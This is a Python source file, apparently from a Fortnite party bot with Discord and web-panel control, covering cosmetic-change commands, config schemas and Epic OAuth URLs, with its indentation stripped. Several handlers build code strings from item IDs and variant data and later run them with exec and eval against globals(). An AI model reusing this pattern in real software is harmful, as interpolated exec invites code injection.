await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['set']:
if rawcontent == '':
await reply(message, client, f"[{commands['set']}] [{l('setname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "set", rawcontent)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "set", rawcontent)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['set']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}({result[0]['set']})")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {result[0]['set']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}({result[0]['set']})"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['set']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}({item['set']})")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item}
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addstyle']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pickaxe")]:
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}]]")
return
type_ = convert_to_asset(args[1])
id_ = member_asset(client.party.me, type_)
variants_ = eval(f"client.party.me.{type_}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
result = await loop.run_in_executor(None, search_style, data["search-lang"], id_, type_)
if result is None:
await reply(message, client, l('no_stylechange'))
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {item['name']}"
text += f"\n{l('enter_to_set_style')}"
await reply(message, client, text)
client.select[message.author.id] = {"exec": [f"await client.change_asset('{message.author.id}', '{type_}', '{id_}', {variants_} + {variants['variants']})" for variants in result]}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addstyle']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['setvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter',**variantdict)
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addvariant']:
try:
if True not in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe")]:
await reply(message, client, f"[{commands['addvariant']}] [[{commands['outfit']}] / [{commands['backpack']}] / [{commands['pet']}] / [{commands['pickaxe']}]]")
return
variantdict={}
for count,text in enumerate(args[2:]):
if count % 2 != 0:
continue
try:
variantdict[text]=args[count+3]
except IndexError:
break
type_ = convert_to_type(args[1])
id_ = member_asset(client.party.me, convert_to_asset(args[1]))
variants = client.party.me.create_variants(item='AthenaCharacter',**variantdict)
variants += eval(f"client.party.me.{convert_to_asset(args[1])}_variants")
type_ = convert_to_new_type(type_)
if type_ == "Back Bling" and (id_.startswith("pet_carrier_") or id_.startswith("pet_")):
type_ = "Pet"
if await client.change_asset(message.author.id, type_, id_, variants, client.party.me.enlightenments) is False:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['addvariant']}] [ID] [variant] [{l('number')}]")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0].lower().startswith(id_) for id_ in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_")]:
try:
type_ = convert_to_type(args[0])
if not await client.change_asset(message.author.id, type_, args[0]):
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0].lower().startswith('playlist_'):
try:
await client.party.set_playlist(args[0])
await reply(message, client, l('set_playlist', args[0]))
data['fortnite']['playlist']=args[0]
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
keys = {
"outfitmimic": ["outfitmimic", l('mimic', l("outfit"))],
"backpackmimic": ["backpackmimic", l('mimic', l("backpack"))],
"pickaxemimic": ["pickaxemimic", l('mimic', l("pickaxe"))],
"emotemimic": ["emotemimic", l('mimic', l("emote"))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
else:
if data['caseinsensitive']:
users = {str(user.display_name): user for user in client.party.members if content_ in jaconv.kata2hira(str(user.display_name).lower())}
else:
users = {str(user.display_name): user for user in client.party.members if content_ in str(user.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))
else:
client.select[message.author.id] = {
"exec": [
"""\
setattr(client,value[0],user.id)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], name(user)))""" for user in users.values()
],
"variable": [
{"user": user, "value": value} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_mimic_user')}"
await reply(message, client, text)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}] / {l('name_or_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
keys = {
"outfitlock": ["outfitlock", l('lock', l("outfit"))],
"backpacklock": ["backpacklock", l('lock', l("backpack"))],
"pickaxelock": ["pickaxelock", l('lock', l("pickaxe"))],
"emotelock": ["emotelock", l('lock', l("emote"))],
"whisper": ["whisper", l('command_from', l('whisper'))],
"partychat": ["partychat", l('command_from', l('partychat'))],
"discord": ["discord", l('command_from', l('discord'))],
"web": ["web", l('command_from', l('web'))],
"disablewhisperperfectly": ["whisperperfect", l('disable_perfect', l('whisper'))],
"disablepartychatperfectly": ["partychatperfect", l('disable_perfect', l('partychat'))],
"disablediscordperfectly": ["discordperfect", l('disable_perfect', l('discord'))],
"acceptinvite": ["acceptinvite", l('invite')],
"acceptfriend": ["acceptfriend", l('friend_request')],
"joinmessageenable": ["joinmessageenable", l('join_', l('message'))],
"randommessageenable": ["randommessageenable", l('join_', l('randommessage'))]
}
for key,value in keys.items():
if args[0] in commands[key]:
try:
if args[1] in commands['true']:
setattr(client,value[0],True)
send(display_name,l('set_to', value[1], l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('on')))
elif args[1] in commands['false']:
setattr(client,value[0],False)
send(display_name,l('set_to', value[1], l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', value[1], l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
if ': ' in message.content:
return
if content.isdigit() and client.select.get(message.author.id):
try:
if int(args[0]) == 0:
await reply(message, client, l('please_enter_valid_number'))
return
exec_ = client.select[message.author.id]["exec"][int(args[0])-1]
variable = globals()
variable.update(locals())
if client.select[message.author.id].get("variable"):
variable.update(client.select[message.author.id]["variable"][int(args[0])-1])
await aexec(exec_, variable)
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('please_enter_valid_number'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
else:
if do_itemsearch:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", content, "Item")
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", content, "Item")
if result:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
bot_ready = True
first_boot = True
filename = 'device_auths.json'
web_text = ''
cache_users = {}
cache_items = {}
cache_banners = {}
client_name = {}
ignoretype = [
"Contrail",
"Glider",
"Wrap",
"Loading Screen",
"Music",
"Spray",
"Battle Bus"
]
clients = []
loadedclients = []
whitelist = []
whitelist_ = []
blacklist = []
blacklist_ = []
otherbotlist = []
storedlogs = []
format_pattern = re.compile(r"""\{(.*?)\}""")
config_tags={
"['fortnite']": [dict],
"['fortnite']['email']": [str,"can_be_multiple"],
"['fortnite']['owner']": [str,"can_be_multiple"],
"['fortnite']['platform']": [str,"select_platform"],
"['fortnite']['outfit']": [str],
"['fortnite']['outfit_style']": [str],
"['fortnite']['backpack']": [str],
"['fortnite']['backpack_style']": [str],
"['fortnite']['pickaxe']": [str],
"['fortnite']['pickaxe_style']": [str],
"['fortnite']['emote']": [str],
"['fortnite']['playlist']": [str],
"['fortnite']['banner']": [str],
"['fortnite']['banner_color']": [str],
"['fortnite']['avatar_id']": [str],
"['fortnite']['avatar_color']": [str,"can_linebreak"],
"['fortnite']['level']": [int],
"['fortnite']['tier']": [int],
"['fortnite']['xpboost']": [int],
"['fortnite']['friendxpboost']": [int],
"['fortnite']['status']": [str],
"['fortnite']['privacy']": [str,"select_privacy"],
"['fortnite']['whisper']": [bool_,"select_bool"],
"['fortnite']['partychat']": [bool_,"select_bool"],
"['fortnite']['disablewhisperperfectly']": [bool_,"select_bool"],
"['fortnite']['disablepartychatperfectly']": [bool_,"select_bool"],
"['fortnite']['ignorebot']": [bool_,"select_bool"],
"['fortnite']['joinmessage']": [str,"can_linebreak"],
"['fortnite']['randommessage']": [str,"can_be_multiple"],
"['fortnite']['joinmessageenable']": [bool_,"select_bool"],
"['fortnite']['randommessageenable']": [bool_,"select_bool"],
"['fortnite']['joinemote']": [bool_,"select_bool"],
"['fortnite']['click_invite']": [bool_,"select_bool"],
"['fortnite']['disable_voice']": [bool_,"select_bool"],
"['fortnite']['outfitmimic']": [bool_,"select_bool"],
"['fortnite']['backpackmimic']": [bool_,"select_bool"],
"['fortnite']['pickaxemimic']": [bool_,"select_bool"],
"['fortnite']['emotemimic']": [bool_,"select_bool"],
"['fortnite']['mimic-ignorebot']": [bool_,"select_bool"],
"['fortnite']['mimic-ignoreblacklist']": [bool_,"select_bool"],
"['fortnite']['outfitlock']": [bool_,"select_bool"],
"['fortnite']['backpacklock']": [bool_,"select_bool"],
"['fortnite']['pickaxelock']": [bool_,"select_bool"],
"['fortnite']['emotelock']": [bool_,"select_bool"],
"['fortnite']['acceptinvite']": [bool_,"select_bool"],
"['fortnite']['acceptfriend']": [bool_none,"select_bool_none"],
"['fortnite']['addfriend']": [bool_,"select_bool"],
"['fortnite']['invite-ownerdecline']": [bool_,"select_bool"],
"['fortnite']['inviteinterval']": [bool_,"select_bool"],
"['fortnite']['interval']": [int],
"['fortnite']['waitinterval']": [int],
"['fortnite']['hide-user']": [bool_,"select_bool"],
"['fortnite']['hide-blacklist']": [bool_,"select_bool"],
"['fortnite']['show-owner']": [bool_,"select_bool"],
"['fortnite']['show-whitelist']": [bool_,"select_bool"],
"['fortnite']['show-bot']": [bool_,"select_bool"],
"['fortnite']['blacklist']": [str,"can_be_multiple"],
"['fortnite']['blacklist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['blacklist-autoblock']": [bool_,"select_bool"],
"['fortnite']['blacklist-autokick']": [bool_,"select_bool"],
"['fortnite']['blacklist-autochatban']": [bool_,"select_bool"],
"['fortnite']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['fortnite']['whitelist']": [str,"can_be_multiple"],
"['fortnite']['whitelist-allowinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-declineinvite']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignorelock']": [bool_,"select_bool"],
"['fortnite']['whitelist-ownercommand']": [bool_,"select_bool"],
"['fortnite']['whitelist-ignoreng']": [bool_,"select_bool"],
"['fortnite']['invitelist']": [str,"can_be_multiple"],
"['fortnite']['otherbotlist']": [str,"can_be_multiple"],
"['discord']": [dict],
"['discord']['enabled']": [bool_,"select_bool"],
"['discord']['token']": [str],
"['discord']['owner']": [int,"can_be_multiple"],
"['discord']['channels']": [str,"can_be_multiple"],
"['discord']['status']": [str],
"['discord']['status_type']": [str,"select_status"],
"['discord']['discord']": [bool_,"select_bool"],
"['discord']['disablediscordperfectly']": [bool_,"select_bool"],
"['discord']['ignorebot']": [bool_,"select_bool"],
"['discord']['blacklist']": [str,"can_be_multiple"],
"['discord']['blacklist-ignorecommand']": [bool_,"select_bool"],
"['discord']['whitelist']": [str,"can_be_multiple"],
"['discord']['whitelist-ignorelock']": [bool_,"select_bool"],
"['discord']['whitelist-ownercommand']": [bool_,"select_bool"],
"['discord']['whitelist-ignoreng']": [bool_,"select_bool"],
"['web']": [dict],
"['web']['enabled']": [bool_,"select_bool"],
"['web']['ip']": [str],
"['web']['port']": [int],
"['web']['password']": [str],
"['web']['login_required']": [bool_,"select_bool"],
"['web']['web']": [bool_,"select_bool"],
"['web']['log']": [bool_,"select_bool"],
"['replies-matchmethod']": [str,"select_matchmethod"],
"['ng-words']": [str,"can_be_multiple"],
"['ng-word-matchmethod']": [str,"select_matchmethod"],
"['ng-word-kick']": [bool_,"select_bool"],
"['ng-word-chatban']": [bool_,"select_bool"],
"['ng-word-blacklist']": [bool_,"select_bool"],
"['restart_in']": [int],
"['search_max']": [int],
"['lang']": [str,"select_lang"],
"['search-lang']": [str,"select_ben_lang"],
"['sub-search-lang']": [str,"select_ben_lang"],
"['no-logs']": [bool_,"select_bool"],
"['ingame-error']": [bool_,"select_bool"],
"['discord-log']": [bool_,"select_bool"],
"['omit-over2000']": [bool_,"select_bool"],
"['skip-if-overflow']": [bool_,"select_bool"],
"['hide-email']": [bool_,"select_bool"],
"['hide-token']": [bool_,"select_bool"],
"['hide-webhook']": [bool_,"select_bool"],
"['webhook']": [str],
"['caseinsensitive']": [bool_,"select_bool"],
"['loglevel']": [str,"select_loglevel"],
"['debug']": [bool_,"select_bool"]
}
config_tags_raw = copy.deepcopy(config_tags)
commands_tags={
"['usercommands']": [str,"can_be_multiple"],
"['true']": [str,"can_be_multiple"],
"['false']": [str,"can_be_multiple"],
"['me']": [str,"can_be_multiple"],
"['prev']": [str,"can_be_multiple"],
"['eval']": [str,"can_be_multiple"],
"['exec']": [str,"can_be_multiple"],
"['restart']": [str,"can_be_multiple"],
"['relogin']": [str,"can_be_multiple"],
"['reload']": [str,"can_be_multiple"],
"['addblacklist']": [str,"can_be_multiple"],
"['removeblacklist']": [str,"can_be_multiple"],
"['addwhitelist']": [str,"can_be_multiple"],
"['removewhitelist']": [str,"can_be_multiple"],
"['addblacklist_discord']": [str,"can_be_multiple"],
"['removeblacklist_discord']": [str,"can_be_multiple"],
"['addwhitelist_discord']": [str,"can_be_multiple"],
"['removewhitelist_discord']": [str,"can_be_multiple"],
"['addinvitelist']": [str,"can_be_multiple"],
"['removeinvitelist']": [str,"can_be_multiple"],
"['get']": [str,"can_be_multiple"],
"['friendcount']": [str,"can_be_multiple"],
"['pendingcount']": [str,"can_be_multiple"],
"['blockcount']": [str,"can_be_multiple"],
"['friendlist']": [str,"can_be_multiple"],
"['pendinglist']": [str,"can_be_multiple"],
"['blocklist']": [str,"can_be_multiple"],
"['outfitmimic']": [str,"can_be_multiple"],
"['backpackmimic']": [str,"can_be_multiple"],
"['pickaxemimic']": [str,"can_be_multiple"],
"['emotemimic']": [str,"can_be_multiple"],
"['whisper']": [str,"can_be_multiple"],
"['partychat']": [str,"can_be_multiple"],
"['discord']": [str,"can_be_multiple"],
"['web']": [str,"can_be_multiple"],
"['disablewhisperperfectly']": [str,"can_be_multiple"],
"['disablepartychatperfectly']": [str,"can_be_multiple"],
"['disablediscordperfectly']": [str,"can_be_multiple"],
"['acceptinvite']": [str,"can_be_multiple"],
"['acceptfriend']": [str,"can_be_multiple"],
"['joinmessageenable']": [str,"can_be_multiple"],
"['randommessageenable']": [str,"can_be_multiple"],
"['wait']": [str,"can_be_multiple"],
"['join']": [str,"can_be_multiple"],
"['joinid']": [str,"can_be_multiple"],
"['leave']": [str,"can_be_multiple"],
"['invite']": [str,"can_be_multiple"],
"['inviteall']": [str,"can_be_multiple"],
"['message']": [str,"can_be_multiple"],
"['partymessage']": [str,"can_be_multiple"],
"['sendall']": [str,"can_be_multiple"],
"['status']": [str,"can_be_multiple"],
"['avatar']": [str,"can_be_multiple"],
"['banner']": [str,"can_be_multiple"],
"['level']": [str,"can_be_multiple"],
"['bp']": [str,"can_be_multiple"],
"['privacy']": [str,"can_be_multiple"],
"['privacy_public']": [str,"can_be_multiple"],
"['privacy_friends_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_friends']": [str,"can_be_multiple"],
"['privacy_private_allow_friends_of_friends']": [str,"can_be_multiple"],
"['privacy_private']": [str,"can_be_multiple"],
"['getuser']": [str,"can_be_multiple"],
"['getfriend']": [str,"can_be_multiple"],
"['getpending']": [str,"can_be_multiple"],
"['getblock']": [str,"can_be_multiple"],
"['info']": [str,"can_be_multiple"],
"['info_party']": [str,"can_be_multiple"],
"['pending']": [str,"can_be_multiple"],
"['removepending']": [str,"can_be_multiple"],
"['addfriend']": [str,"can_be_multiple"],
"['removefriend']": [str,"can_be_multiple"],
"['removeallfriend']": [str,"can_be_multiple"],
"['remove_offline_for']": [str,"can_be_multiple"],
"['acceptpending']": [str,"can_be_multiple"],
"['declinepending']": [str,"can_be_multiple"],
"['blockfriend']": [str,"can_be_multiple"],
"['unblockfriend']": [str,"can_be_multiple"],
"['voice']": [str,"can_be_multiple"],
"['chatban']": [str,"can_be_multiple"],
"['promote']": [str,"can_be_multiple"],
"['kick']": [str,"can_be_multiple"],
"['hide']": [str,"can_be_multiple"],
"['show']": [str,"can_be_multiple"],
"['ready']": [str,"can_be_multiple"],
"['unready']": [str,"can_be_multiple"],
"['sitout']": [str,"can_be_multiple"],
"['match']": [str,"can_be_multiple"],
"['unmatch']": [str,"can_be_multiple"],
"['swap']": [str,"can_be_multiple"],
"['outfitlock']": [str,"can_be_multiple"],
"['backpacklock']": [str,"can_be_multiple"],
"['pickaxelock']": [str,"can_be_multiple"],
"['emotelock']": [str,"can_be_multiple"],
"['stop']": [str,"can_be_multiple"],
"['addeditems']": [str,"can_be_multiple"],
"['shopitems']": [str,"can_be_multiple"],
"['alloutfit']": [str,"can_be_multiple"],
"['allbackpack']": [str,"can_be_multiple"],
"['allpet']": [str,"can_be_multiple"],
"['allpickaxe']": [str,"can_be_multiple"],
"['allemote']": [str,"can_be_multiple"],
"['allemoji']": [str,"can_be_multiple"],
"['alltoy']": [str,"can_be_multiple"],
"['cid']": [str,"can_be_multiple"],
"['bid']": [str,"can_be_multiple"],
"['petcarrier']": [str,"can_be_multiple"],
"['pickaxe_id']": [str,"can_be_multiple"],
"['eid']": [str,"can_be_multiple"],
"['emoji_id']": [str,"can_be_multiple"],
"['toy_id']": [str,"can_be_multiple"],
"['id']": [str,"can_be_multiple"],
"['outfit']": [str,"can_be_multiple"],
"['backpack']": [str,"can_be_multiple"],
"['pet']": [str,"can_be_multiple"],
"['pickaxe']": [str,"can_be_multiple"],
"['emote']": [str,"can_be_multiple"],
"['emoji']": [str,"can_be_multiple"],
"['toy']": [str,"can_be_multiple"],
"['item']": [str,"can_be_multiple"],
"['set']": [str,"can_be_multiple"],
"['setvariant']": [str,"can_be_multiple"],
"['addvariant']": [str,"can_be_multiple"],
"['setstyle']": [str,"can_be_multiple"],
"['addstyle']": [str,"can_be_multiple"],
"['setenlightenment']": [str,"can_be_multiple"]
}
error_config = []
error_commands = []
outfit_keys = ("cid", "outfit", "outfitmimic", "outfitlock", "alloutfit")
backpack_keys = ("bid", "backpack", "backpackmimic", "backpacklock", "allbackpack")
pet_keys = ("petcarrier", "pet", "allpet")
pickaxe_keys = ("pickaxe_id", "pickaxe", "pickaxemimic", "pickaxelock", "allpickaxe")
emote_keys = ("eid", "emote", "emotemimic", "emotelock", "allemote")
emoji_keys = ("emoji_id", "emoji", "allemoji")
toy_keys = ("toy_id", "toy", "alltoy")
item_keys = ("id", "item")
app = Sanic(__name__)
app.secret_key = os.urandom(32)
app.static('/images', './templates/images')
env = Environment(loader=FileSystemLoader('./templates', encoding='utf8'), extensions=['jinja2.ext.do'])
auth = LoginManager()
fortnitepy_auth = fortnitepy.Auth()
launcher_token = fortnitepy_auth.ios_token
fortnite_token = fortnitepy_auth.fortnite_token
oauth_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
fortnite_token_url = "https://account-public-service-prod03.ol.epicgames.com/account/api/oauth/token"
exchange_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/token"
device_auth_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/deviceAuthorization"
exchange_url = "https://account-public-service-prod.ol.epicgames.com/account/api/oauth/exchange"
user_lookup_url = "https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{user_id}"
if not load_config():
sys.exit(1)
if error_config or error_commands:
bot_ready = False
for key in error_config:
config_tags[key].append("fix_required")
for key in error_commands:
commands_tags[key].append("fix_required")
search_max = data["search_max"]
if data['debug']:
logger = logging.getLogger('fortnitepy.auth')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.http')
logger.setLevel(level=logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[36m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
logger = logging.getLogger('fortnitepy.xmpp')
logger.setLevel(level=logging.DEBUG)
